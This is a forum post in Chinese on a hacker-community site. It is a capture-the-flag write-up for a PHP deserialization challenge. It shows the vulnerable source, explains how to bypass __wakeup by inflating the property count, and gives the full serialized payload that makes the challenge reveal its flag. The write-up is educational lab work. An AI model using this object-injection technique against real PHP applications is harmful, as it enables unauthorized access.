Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

[极客大挑战 2019]PHP

 Share


KaiWn

Recommended Posts

    • 首先打开题目,一眼看到关键

      2656364-20220709141703821-70602257.png

       

       可以通过工具搜查出来备份文件,博主使用御剑不知怎么的没扫出来,手动验证www.zip或者index.php.bak

      然后下载压缩包,解压得到

      2656364-20220709142120657-356192353.png

       

       浏览三个源码文件

      <?php
      include 'flag.php';
      
      
      error_reporting(0);
      
      
      class Name{
          private $username = 'nonono';
          private $password = 'yesyes';
      
          public function __construct($username,$password){
              $this->username = $username;
              $this->password = $password;
          }
      
          function __wakeup(){
              $this->username = 'guest';
          }
      
          function __destruct(){
              if ($this->password != 100) {
                  echo "</br>NO!!!hacker!!!</br>";
                  echo "You name is: ";
                  echo $this->username;echo "</br>";
                  echo "You password is: ";
                  echo $this->password;echo "</br>";
                  die();
              }
              if ($this->username === 'admin') {
                  global $flag;
                  echo $flag;
              }else{
                  echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
                  die();
      
                  
              }
          }
      }
      ?>
      <div id="world">
          <div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 85%;left: 440px;font-family:KaiTi;">因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯
          </div>
          <div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 80%;left: 700px;font-family:KaiTi;">不愧是我!!!
          </div>
          <div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 70%;left: 640px;font-family:KaiTi;">
          <?php
          include 'class.php';
          $select = $_GET['select'];
          $res=unserialize(@$select);
          ?>
          </div>
          <div style="position: absolute;bottom: 5%;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
      </div>
      <script src='http://cdnjs.cloudflare.com/ajax/libs/three.js/r70/three.min.js'></script>
      <script src='http://cdnjs.cloudflare.com/ajax/libs/gsap/1.16.1/TweenMax.min.js'></script>
      <script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/OrbitControls.js'></script>
      <script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/Cat.js'></script>
      <script  src="index.js"></script>
      </body>
      </html>

       审计代码后,感觉需要提交select而且提交的值是经过序列化之后的值,username=‘admin’,password=‘100’ 才能过。

      <?php
      class Name{
          private $username = 'admin';
          private $password = 100;
      }
      $a=new Name();
      echo serialize($a);
      ?>

      结果为  O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

      提交发现并没有成功

      2656364-20220709143017434-263758942.png

       

      突然发现有空格没有复制上去,再次提交

      2656364-20220709143216516-1662470580.png

       

      2656364-20220709143218971-1079157445.png

       

       仍然不对,只能再次审计源码

      发现类外部使用serialize()函数进行序列化的时候,会先调用类内部的__sleep()方法,相同的道理,调用 unserialize()函数的时候会先调用__wakeup()方法

      既然调用了__wakeup()方法,那么就要绕过或者破解它,这个方法有个缺点就是就是当参数的个数大于实际参数个数的时候就可以跳过执行__wakeup()方法

      所以经过修改变成 1 ?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;} 

      2656364-20220709144121854-954672841.png

       但仍然不对,再看网址,发现增加了%25,是因为上传是被url编码了,手动去掉就可以得到

      2656364-20220709144347271-795083293.png

Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...